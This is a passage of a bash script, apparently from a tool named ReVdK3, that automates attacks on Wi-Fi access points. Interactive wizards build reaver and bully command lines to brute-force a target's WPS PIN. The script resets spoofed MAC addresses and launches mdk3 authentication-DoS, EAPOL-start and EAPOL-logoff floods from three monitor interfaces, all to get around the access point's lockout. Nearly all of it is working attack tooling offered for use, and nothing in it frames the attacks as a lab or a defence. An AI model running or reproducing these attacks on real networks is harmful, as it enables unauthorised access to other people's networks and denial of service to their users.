echo -e "\e[36m\e[40m\e[1mx REAVER COMMAND LINE YOU HAVE CHOOSEN x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Build REAVER_COMMAND_LINE for every combination of the three optional
# switches (set vs empty). Note: the first test uses bare "$TIMEOUT",
# which is equivalent to -n "$TIMEOUT" here.
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" -a "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv"`;
echo;
fi
if [ -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -t "$TIMEOUT" -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -z "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv"`;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
echo ;
# Anything other than 'r' accepts the configuration and ends the loop.
read -p "Are you satisified with this configuration? if not, input 'r' and you will be returned to Reaver's Configuration Wizard": SATISFIED_OPTION;
# Remove stale temp files from any previous run before starting attacks.
if [ -e /etc/reaver_tmp.txt ]; then
rm -f /etc/reaver_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}
# Interactive wizard (parallel to REAVER_COMMAND_LINE_OPTIONS) that gathers
# the target MAC/ESSID and optional bully switches (-c channel, -1 pin delay,
# -B -F checksum bruteforce), restores the original adapter MAC, then
# assembles BULLY_COMMAND_LINE. Loops while the user answers 'r'.
function BULLY_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Bully's configuration *\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx MAC ADDRESS OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Target MAC is mandatory; keep prompting until non-empty.
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ESSID OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo -e "\e[36m\e[1mResetting your mac address to its original mac\e[0m";
sleep 2;
# bully needs the real (permanent) MAC, so undo any earlier spoofing with
# macchanger -p on the wlan and all three monitor interfaces.
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $MON1 down;
ifconfig $MON1 down;
ifconfig $MON2 down;
ifconfig $MON2 down;
ifconfig $MON3 down;
ifconfig $MON3 down;
macchanger -p "$WLAN"> /dev/null;
macchanger -p "$MON1"> /dev/null;
macchanger -p "$MON2"> /dev/null;
macchanger -p "$MON3"> /dev/null;
ifconfig $MON1 up;
ifconfig $MON1 up;
ifconfig $MON2 up;
ifconfig $MON2 up;
ifconfig $MON3 up;
ifconfig $MON3 up;
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx Bully's Options x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot! x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully's time between pin (-1) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Force Bruteforce Checksum Digit (-B -F) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[34m\e[7m\e[1mNote:\e[31m\e[0m\e[31m\e[1m
Timeout option (-t) is Deprecated / Ignored in bully.\e[30m\e[0m"
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx CHANNEL SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Optional channel: empty (ENTER) or 1-16, validated by extglob pattern.
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default bully's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|) ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default bully's option": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx FIRST HALF OF PIN DELAY SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Optional -1 value; the bracket pattern rejects non-positive-number input.
read -p "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[ $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
echo ;
#BRUTEFORCE CHECKSUM
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx BRUTEFORCE CHECKSUM DIGIT SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# y/Y enables -B -F (bruteforce the checksum digit); ENTER leaves it off.
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found?Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
while [[ $BRUTEFORCE_CHECKSUM != @(y|Y|) ]]; do
echo -e "\e[31m\e[1mYou need to input 'y'or 'Y' for 'yes' OR or press ENTER for 'no' !\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found?Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
echo;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx BULLY COMMAND LINE YOU HAVE CHOOSEN x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Build BULLY_COMMAND_LINE for every combination of channel/pin-delay,
# first without and then with the -B -F checksum-bruteforce switches.
############### -B -F arguments false###############################
if [ -z $BRUTEFORCE_CHECKSUM ]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -F $MON1"`;
echo ;
fi
fi
############### -B -F arguments true###############################
if [[ "$BRUTEFORCE_CHECKSUM" = @(y|Y) ]]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
fi
echo -e "\e[34m\e[7m\e[1mWarning:\e[31m\e[0m\e[31m\e[1m
Your mac address is not spoofed when using bully for proper functionality of
bully.\e[30m\e[0m"
echo ;
# Anything other than 'r' accepts the configuration and ends the loop.
read -p "Are you satisified with this configuration? if not, input 'r' and you will be returned to Bully's Configuration Wizard": SATISFIED_OPTION;
# Remove stale temp files from any previous run before starting attacks.
if [ -e /etc/bully_tmp.txt ]; then
rm -f /etc/bully_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}
# Pin cracker selection menu: let the user pick reaver or bully, verify the
# chosen tool is actually installed, then run its configuration wizard.
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ReVdK3 preferred WPS Pin Crackers x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Reaver v1.4 (legendary) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx Choose this option if you prefer to crack with reaver v1.4 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully v1.0-22 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx Choose this option if you prefer to crack with bully v1.0-22 x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
# Only '1' (reaver) or '2' (bully) are accepted.
while [[ $WPS_PIN_CRACKER_OPTION != @(1|2) ]]; do
echo -e "\e[31m\e[1mIncorrect Option, input either '1' for reaver or '2' for bully\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
echo ;
done
# Launch the matching configuration wizard, or abort if the tool is absent.
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
if [ ! -z "$REAVER_CHECK" ]; then
clear;
REAVER_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mreaver is not installed.Exiting script...\e[30m\e[0m";
exit
fi
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
if [ ! -z "$BULLY_CHECK" ]; then
clear;
BULLY_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mbully is not installed.Exiting script...\e[30m\e[0m";
exit
fi
fi
# Top-level menu for choosing which mdk3 flood attack to pair with the pin
# cracker; validates the choice, then dispatches to the matching sub-menu.
function MDK3_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx WELCOME TO MDK3 FLOOD ATTACK MAIN MENU x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Authentication DoS Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] EAPOL Start Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] EAPOL log off Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx NOTE:This script will stop reaver once it detects the AP is locked and x\e[0m";
echo -e "\e[36m\e[40m\e[1mx then flood the Access Point for the time period you choose after flooding x\e[0m";
echo -e "\e[36m\e[40m\e[1mx reaver resumes.This process goes on until reaver finds the correct pin! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
# Re-prompt until the answer is one of the three listed attacks.
while [[ "$MDK3_MAIN_MENU_OPTION" != @(1|2|3) ]]; do
echo -e "\e[31m\e[1mIncorrect Option choosen, Please choose an option from the Main Menu!\e[0m";
echo ;
read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
done;
# Dispatch to the chosen attack's sub-menu.
case "$MDK3_MAIN_MENU_OPTION" in
1)
clear
AUTH_DOS_MAIN_MENU;
;;
2)
clear
EAPOL_START_FLOOD_ATTACK_MAIN_MENU;
;;
3)
clear
EAPOL_LOG_OFF_ATTACK_MAIN_MENU;
;;
esac
}
###########################################################################
# Sub-menu for the mdk3 Authentication DoS flood (mdk3 <mon> a -a <bssid>).
# Shows the command lines that will run on all three monitor interfaces,
# then starts the selected pin cracker together with the aireplay
# keep-alive, the mdk3 watchdog and the log tailer as parallel jobs.
# Globals read: MON1 MON2 MON3 MAC WPS_PIN_CRACKER_OPTION.
function AUTH_DOS_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                     Authentication DoS Flood Attack                          x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous fake clients       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxuntil reaver detects that the AP is unlocked. The attack will restart when   x\e[0m";
echo -e "\e[36m\e[40m\e[1mxthe AP has locked itself again...the process goes on!                        x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication DoS Flood Command line below will be used       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Preview (display only) of the mdk3 command lines the watchdog will run.
AUTH_DOS_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 a -a $MAC -s 200 & mdk3 $MON2 a -a $MAC -s 200 & mdk3 "$MON3" a -a $MAC -s 200\e[0m"`;
echo "$AUTH_DOS_FLOOD_COMMAND";
echo ;
# 'r' returns to the mdk3 main menu; anything else starts the attack.
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS
if [ "$RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS" = r ]; then
clear
MDK3_MAIN_MENU
fi
echo -e "\e[36m\e[1mStarting MDK3 Auth Flood Attack...\e[0m"
sleep 3;
clear
# Launch the chosen cracker plus its helper jobs in the background.
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
###########################################################################
# Sub-menu for the mdk3 EAPOL Start flood (mdk3 <mon> x 0 -t <bssid>).
# Shows the command lines that will run on all three monitor interfaces,
# then starts the selected pin cracker with its helper jobs.
# Globals read: MON1 MON2 MON3 MAC ESSID WPS_PIN_CRACKER_OPTION.
function EAPOL_START_FLOOD_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                            EAPOL Start Flood Attack                         x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL start        x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will        x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!           x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Start Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Preview (display only) of the mdk3 command lines the watchdog will run.
EAPOL_START_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200\e[0m"`;
echo "$EAPOL_START_FLOOD_COMMAND";
# 'r' returns to the mdk3 main menu; anything else starts the attack.
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_START_FLOOD;
if [ "$RETURN_OPTION_FOR_EAPOL_START_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Start Flood Attack...\e[0m";
sleep 3;
# Clear the menu before launching, consistent with the other attack menus.
clear
# Launch the chosen cracker plus its helper jobs in the background.
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
###########################################################################
# Sub-menu for the mdk3 EAPOL Log Off flood (mdk3 <mon> x 1 -t <bssid> -c <sta>).
# Prompts for a connected client's MAC (needed for log-off spoofing), shows
# the command lines, then starts the selected pin cracker with its helpers.
# Globals read: MON1 MON2 MON3 MAC WPS_PIN_CRACKER_OPTION.
# Globals set: TARGET_STATION (consumed by the MDK3_FOR_* watchdogs).
function EAPOL_LOG_OFF_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                            EAPOL Log Off Flood Attack                       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL log off      x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will        x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!           x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
read -p "What is the MAC address of one of the client's connected?": TARGET_STATION
# Extglob @(|) matches only the empty string: loop until non-empty input.
while [[ "$TARGET_STATION" = @(|) ]]; do
echo -e "\e[31m\e[1mYou cannot leave this field blank\e[0m";
echo
read -p "What is the MAC address of one of the client connected?": TARGET_STATION
done
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Log Off Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Preview (display only) of the mdk3 command lines the watchdog will run.
EAPOL_LOG_OFF_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION\e[0m"`;
echo "$EAPOL_LOG_OFF_FLOOD_COMMAND";
# 'r' returns to the mdk3 main menu; anything else starts the attack.
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
if [ "$RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Log Off Flood Attack...\e[0m";
sleep 3;
clear;
# Launch the chosen cracker plus its helper jobs in the background.
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
